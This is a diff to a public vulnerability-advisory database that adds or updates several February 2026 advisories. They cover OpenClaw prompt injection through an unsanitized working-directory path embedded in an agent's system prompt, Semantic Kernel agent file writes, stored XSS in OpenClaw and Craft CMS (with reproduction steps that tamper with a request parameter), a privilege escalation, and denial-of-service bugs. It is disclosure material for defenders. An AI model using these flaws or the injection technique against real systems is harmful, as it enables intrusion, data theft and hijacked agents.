b/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json new file mode 100644 index 0000000000000..a0a0c5b5f1d21 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2qj5-gwg2-xwc4", + "modified": "2026-02-20T16:46:56Z", + "published": "2026-02-18T22:42:29Z", + "aliases": [ + "CVE-2026-27001" + ], + "summary": "OpenClaw: Unsanitized CWD path injection into LLM prompts", + "details": "## Overview\nOpenClaw embedded the current working directory (workspace path) into the agent system prompt without sanitization. If an attacker can cause OpenClaw to run inside a directory whose name contains control/format characters (for example newlines or Unicode bidi/zero-width markers), those characters could break the prompt structure and inject attacker-controlled instructions.\n\n## Impact\nPrompt injection may alter agent behavior and could lead to unintended tool use or disclosure of sensitive information.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Vulnerable versions: `< 2026.2.15` (latest published vulnerable version as of 2026-02-16: `2026.2.14`)\n- Patched versions: `>= 2026.2.15`\n\n## Fix\nThe workspace path is now sanitized before it is embedded into any LLM prompt output, stripping Unicode control/format characters and explicit line/paragraph separators. Workspace path resolution also applies the same sanitization as defense-in-depth.\n\n## Fix Commit(s)\n- `6254e96acf16e70ceccc8f9b2abecee44d606f79`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.15" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2qj5-gwg2-xwc4" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27001" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/6254e96acf16e70ceccc8f9b2abecee44d606f79" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.15" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:42:29Z", + "nvd_published_at": "2026-02-20T00:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json b/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json index 906376b23efae..92c8917e68d26 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json +++ b/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-2ww3-72rp-wpp4", - "modified": "2026-02-06T21:43:53Z", + "modified": "2026-02-20T19:15:43Z", "published": "2026-02-06T18:37:24Z", "aliases": [ "CVE-2026-25592" ], "summary": "Semantic Kernel has Arbitrary File Write via AI Agent Function Calling in .NET SDK", - "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nAn Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`.\nDevelopers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nThe problem has been fixed in [Microsoft.SemanticKernel.Core version 1.70.0](https://www.nuget.org/packages/Microsoft.SemanticKernel.Core/1.70.0). Users should upgrade to version 1.70.0 or higher.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nUsers can create a [Function Invocation Filter](https://learn.microsoft.com/en-us/semantic-kernel/concepts/enterprise-readiness/filters?pivots=programming-language-csharp#function-invocation-filter) which checks the arguments being passed to any calls to `DownloadFileAsync ` or `UploadFileAsync` and ensures the provided `localFilePath` is allow listed.\n\n### References\n_Are there any links users can visit to find out more?_\n- [Sample showing safe use of the CodeInterpreterPlugin](https://github.com/microsoft/semantic-kernel/blob/main/dotnet/samples/Demos/CodeInterpreterPlugin/Program.cs#L61-L64)\n- [PR to Add file upload security controls to SessionsPythonPlugin](https://github.com/microsoft/semantic-kernel/pull/13478/changes#diff-88d3cacba2bfa84eef8f2aa171b34f9940338cbb784a3ffc49f5fe3af1b8943d)", + "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nAn Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`.\nDevelopers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\nThe problem has been fixed in [Microsoft.SemanticKernel.Plugins.Core version 1.71.0](https://www.nuget.org/packages/Microsoft.SemanticKernel.Plugins.Core/1.71.0). Users should upgrade to version 1.71.0 or higher.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\nUsers can create a [Function Invocation Filter](https://learn.microsoft.com/en-us/semantic-kernel/concepts/enterprise-readiness/filters?pivots=programming-language-csharp#function-invocation-filter) which checks the arguments being passed to any calls to `DownloadFileAsync ` or `UploadFileAsync` and ensures the provided `localFilePath` is allow listed.\n\n### References\n_Are there any links users can visit to find out more?_\n- [Sample showing safe use of the CodeInterpreterPlugin](https://github.com/microsoft/semantic-kernel/blob/main/dotnet/samples/Demos/CodeInterpreterPlugin/Program.cs#L61-L64)\n- [PR to Add file upload security controls to SessionsPythonPlugin](https://github.com/microsoft/semantic-kernel/pull/13478/changes#diff-88d3cacba2bfa84eef8f2aa171b34f9940338cbb784a3ffc49f5fe3af1b8943d)", "severity": [ { "type": "CVSS_V3", @@ -17,8 +17,8 @@ "affected": [ { "package": { - "ecosystem": "NuGet", - "name": "Microsoft.SemanticKernel.Core" + "ecosystem": "PyPI", + "name": "semantic-kernel" }, "ranges": [ { @@ -28,7 +28,7 @@ "introduced": "0" }, { - "fixed": "1.70.0" + "fixed": "1.39.3" } ] } @@ -36,8 +36,8 @@ }, { "package": { - "ecosystem": "PyPI", - "name": "semantic-kernel" + "ecosystem": "NuGet", + "name": "Microsoft.SemanticKernel.Core" }, "ranges": [ { @@ -47,7 +47,7 @@ "introduced": "0" }, { - "fixed": "1.39.3" + "fixed": "1.71.0" } ] } diff --git a/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json b/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json index 624c28abfcc61..f8331a758a47e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json +++ b/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json @@ -51,7 +51,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-522" ], "severity": "MODERATE", "github_reviewed": true, diff --git a/advisories/github-reviewed/2026/02/GHSA-3288-p39f-rqpv/GHSA-3288-p39f-rqpv.json b/advisories/github-reviewed/2026/02/GHSA-3288-p39f-rqpv/GHSA-3288-p39f-rqpv.json new file mode 100644 index 0000000000000..b34cd5da7c006 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3288-p39f-rqpv/GHSA-3288-p39f-rqpv.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3288-p39f-rqpv", + "modified": "2026-02-19T15:17:41Z", + "published": "2026-02-19T15:17:41Z", + "aliases": [], + "summary": "Unsoundness in opt-in ARMv8 assembly backend for `keccak`", + "details": "### Summary\n\nThe `asm!` block enabled by the off-by-default `asm` feature, when enabled on ARMv8 targets, misspecified the operand\ntype for all of its operands, using `in` for pointers and values which were subsequently mutated by operations performed\nwithin the assembly block.\n\n### Impact\n\nIt's unclear what practical impact, if any, this actually had. Incorrect operand types are technically undefined\nbehavior, however changing them had no actual impact on the generated assembly for these targets. The possibility still\nexists that it may lead to potential memory safety or other issues on hypothetical future versions of rustc.\n\n### Mitigation\n\nThe operand types were changed from `in` to `inout`, and the impacted versions of the `keccak` crate were yanked.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "keccak" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.1.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/RustCrypto/sponges/pull/101" + }, + { + "type": "WEB", + "url": "https://github.com/RustCrypto/sponges/commit/7ac1920198ebb7d0192e6d2c3581e15b38a6e0e5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/RustCrypto/sponges" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2026-0012.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-758" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T15:17:41Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json b/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json index 34c9265b95e5b..e1ac8f6e24636 100644 --- a/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json +++ b/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-33fm-6gp7-4p47", - "modified": "2026-02-17T16:37:55Z", + "modified": "2026-02-19T20:30:31Z", "published": "2026-02-17T16:37:55Z", "aliases": [ "CVE-2026-24126" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/WeblateOrg/weblate/security/advisories/GHSA-33fm-6gp7-4p47" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24126" + }, { "type": "WEB", "url": "https://github.com/WeblateOrg/weblate/pull/17722" @@ -60,6 +64,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-17T16:37:55Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T00:16:21Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-33hq-fvwr-56pm/GHSA-33hq-fvwr-56pm.json b/advisories/github-reviewed/2026/02/GHSA-33hq-fvwr-56pm/GHSA-33hq-fvwr-56pm.json new file mode 100644 index 0000000000000..8fc9c6ffc6896 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-33hq-fvwr-56pm/GHSA-33hq-fvwr-56pm.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33hq-fvwr-56pm", + "modified": "2026-02-19T20:29:30Z", + "published": "2026-02-19T20:29:30Z", + "aliases": [], + "summary": "devalue affected by CPU and memory amplification from sparse arrays", + "details": "Under certain circumstances, serializing sparse arrays using `uneval` or `stringify` could cause CPU and/or memory exhaustion. When this occurs on the server, it results in a DoS. This is extremely difficult to take advantage of in practice, as an attacker would have to manage to create a sparse array on the server — which is impossible in every mainstream wire format — and then that sparse array would have to be run through `uneval` or `stringify`.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "devalue" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.6.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.6.2" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sveltejs/devalue/security/advisories/GHSA-33hq-fvwr-56pm" + }, + { + "type": "WEB", + "url": "https://github.com/sveltejs/devalue/commit/819f1ac7475ab37547645cfb09bf2f678a799cf0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sveltejs/devalue" + }, + { + "type": "WEB", + "url": "https://github.com/sveltejs/devalue/releases/tag/v5.6.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:29:30Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json b/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json new file mode 100644 index 0000000000000..d93d859f2120c --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34p4-7w83-35g2", + "modified": "2026-02-23T22:27:29Z", + "published": "2026-02-19T20:31:07Z", + "aliases": [ + "CVE-2026-27198" + ], + "summary": "Formwork Improperly Managed Privileges in User creation", + "details": "### Summary\n\nThe application fails to properly enforce role-based authorization during account creation. Although the system validates that the specified role exists, it does not verify whether the current user has sufficient privileges to assign highly privileged roles such as admin. As a result, an authenticated user with the editor role can create a new account with administrative privileges, leading to full administrative access and complete compromise of the CMS.\n\n### Impact\n\nSuccessful exploitation allows an attacker to:\n- Gain full administrative control over the CMS.\n- Access all site data and user information. \n- Modify system configuration and security settings.\n- Create, modify, or delete any user account, including legitimate administrators.\n\n### Patches\n\n[Formwork 2.3.4](https://github.com/getformwork/formwork/releases/tag/2.3.4) properly assigns roles on user creation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "getformwork/formwork" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.3.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.3.3" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/getformwork/formwork/security/advisories/GHSA-34p4-7w83-35g2" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27198" + }, + { + "type": "WEB", + "url": "https://github.com/getformwork/formwork/commit/19390a0b408e084bdef86f3581e050f3ee51e7cd" + }, + { + "type": "PACKAGE", + "url": "https://github.com/getformwork/formwork" + }, + { + "type": "WEB", + "url": "https://github.com/getformwork/formwork/releases/tag/2.3.4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:31:07Z", + "nvd_published_at": "2026-02-21T06:17:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json b/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json new file mode 100644 index 0000000000000..0955af09fee2e --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json @@ -0,0 +1,112 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-378v-28hj-76wf", + "modified": "2026-02-24T14:45:53Z", + "published": "2026-02-20T06:30:39Z", + "aliases": [ + "CVE-2026-2739" + ], + "summary": "bn.js affected by an infinite loop", + "details": "This affects versions of the package bn.js before 4.12.3 and 5.2.3. Calling maskn(0) on any BN instance corrupts the internal state, causing toString(), divmod(), and other methods to enter an infinite loop, hanging the process indefinitely.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "bn.js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.12.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "bn.js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.2.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2739" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/issues/186" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/issues/316" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/issues/316#issuecomment-3924217358" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/pull/317" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/commit/33df26b5771e824f303a79ec6407409376baa64b" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Kr0emer/02370d18328c28b5dd7f9ac880d22a91" + }, + { + "type": "PACKAGE", + "url": "https://github.com/indutny/bn.js" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/releases/tag/v5.2.3" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JS-BNJS-15274301" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-835" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:18:31Z", + "nvd_published_at": "2026-02-20T05:17:53Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json b/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json new file mode 100644 index 0000000000000..15ac4ab2878ea --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-37gc-85xm-2ww6", + "modified": "2026-02-20T16:47:40Z", + "published": "2026-02-18T22:44:33Z", + "aliases": [ + "CVE-2026-27009" + ], + "summary": "OpenClaw affected by Stored XSS in Control UI via unsanitized assistant name/avatar in inline script injection", + "details": "## Summary\nStored XSS in the OpenClaw Control UI when rendering assistant identity (name/avatar) into an inline `` could break out of the script tag and execute attacker-controlled JavaScript in the Control UI origin.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.14`\n- Fixed in: `>= 2026.2.15` (next release; fix is already merged on `main`)\n\n## Details\nThe gateway Control UI HTML response previously injected `assistantName` and `assistantAvatar` directly into an inline `` from terminating the script element, enabling stored XSS if an operator/admin sets the assistant identity to a malicious string.\n\nOpenClaw’s Control UI is intended for local use only (see `SECURITY.md`); this advisory’s CVSS reflects a loopback-only/local-access deployment assumption.\n\n## Impact\nAn attacker with the ability to set assistant identity values (config or agent identity) could cause JavaScript execution for Control UI visitors, enabling token/session theft and privileged actions in the UI.\n\n## Fix\n- Removed inline script injection and serve bootstrap config from a JSON endpoint.\n- Added a restrictive Content Security Policy for the Control UI (`script-src 'self'`, no inline scripts).\n\n## Fix Commit(s)\n- `adc818db4a4b3b8d663e7674ef20436947514e1b`\n- `3b4096e02e7e335f99f5986ec1bd566e90b14a7e`\n\n## Release Process Note\nThis advisory pre-sets the patched version to the planned next release (`2026.2.15`). Once that version is published to npm, this advisory can be published without further edits.\n\nThanks @Adam55A-code for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.15" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-37gc-85xm-2ww6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27009" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/3b4096e02e7e335f99f5986ec1bd566e90b14a7e" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/adc818db4a4b3b8d663e7674ef20436947514e1b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.15" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:44:33Z", + "nvd_published_at": "2026-02-20T00:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3c9r-7f29-qp32/GHSA-3c9r-7f29-qp32.json b/advisories/github-reviewed/2026/02/GHSA-3c9r-7f29-qp32/GHSA-3c9r-7f29-qp32.json new file mode 100644 index 0000000000000..1bdceda443b82 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3c9r-7f29-qp32/GHSA-3c9r-7f29-qp32.json @@ -0,0 +1,141 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3c9r-7f29-qp32", + "modified": "2026-02-19T19:34:56Z", + "published": "2026-02-16T12:30:24Z", + "aliases": [ + "CVE-2026-0999" + ], + "summary": "Mattermost fails to properly validate login method restrictions", + "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to properly validate login method restrictions which allows an authenticated user to bypass SSO-only login requirements via userID-based authentication. Mattermost Advisory ID: MMSA-2025-00548", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost/server/v8" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "8.0.0-20251212052346-61651b0df7ea" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.1.3" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.11.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 10.11.10" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.2.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.2.2" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.3.2-0.20251212052346-61651b0df7ea" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0999" + }, + { + "type": "WEB", + "url": "https://github.com/mattermost/mattermost/commit/61651b0df7ea5db55d1e54f8d6fb5fce4149309c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mattermost/mattermost" + }, + { + "type": "WEB", + "url": "https://mattermost.com/security-updates" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-303" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T19:34:56Z", + "nvd_published_at": "2026-02-16T10:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json index 54ea267f43b37..6dbb90ce41f2d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json +++ b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3fqr-4cg8-h96q", - "modified": "2026-02-18T00:53:59Z", + "modified": "2026-02-20T16:46:03Z", "published": "2026-02-18T00:53:59Z", "aliases": [ "CVE-2026-26317" @@ -59,6 +59,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3fqr-4cg8-h96q" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26317" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/b566b09f81e2b704bf9398d8d97d5f7a90aa94c3" @@ -79,6 +83,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:53:59Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T22:16:47Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json b/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json new file mode 100644 index 0000000000000..e37f0549714c9 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json @@ -0,0 +1,90 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jh3-prx3-w6wc", + "modified": "2026-02-24T16:08:41Z", + "published": "2026-02-23T22:15:03Z", + "aliases": [ + "CVE-2026-27126" + ], + "summary": "Craft CMS has Stored XSS in Table Field via \"HTML\" Column Type", + "details": "A stored Cross-site Scripting (XSS) vulnerability exists in the `editableTable.twig` component when using the `html` column type. The application fails to sanitize the input, allowing an attacker to execute arbitrary JavaScript when another user views a page with the malicious table field.\n\n## Prerequisites\n* An administrator account\n* `allowAdminChanges` must be enabled in production, which is [against our security recommendations](https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production).\n\n## Steps to Reproduce\n1. Navigate to **Settings** → **Fields** and create a new field with Type: **Table**\n1. Add a **Column Heading** and set **Column Type** to `Single-line text`\n - **Note:** The vulnerable **Column Type** is `html`, but it's not available in the UI dropdown.\n1. In **Default Values** section, add a row with the following payload:\n ```html\n \n ```\n1. Enable `Static Rows`\n1. Intercept the **Save Field** request using a proxy tool (e.g., Burp Suite) or use `cURL` directly\n1. Modify the request body and change the `types[craft-fields-Table][columns][col3][type]` parameter from `singleline` to `html`\n1. Forward the request to save the field\n1. Use the field in any object (e.g. user profile fields) → then visit the any user's profile\n1. Notice the XSS execution\n1. The XSS will also trigger when an administrator attempts to edit this field, as the malicious payload is executed within the field configuration page, too.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0-RC1" + }, + { + "fixed": "4.16.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.16.18" + } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.8.23" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.22" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/security/advisories/GHSA-3jh3-prx3-w6wc" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27126" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/craftcms/cms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:15:03Z", + "nvd_published_at": "2026-02-24T03:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3m4q-jmj6-r34q/GHSA-3m4q-jmj6-r34q.json 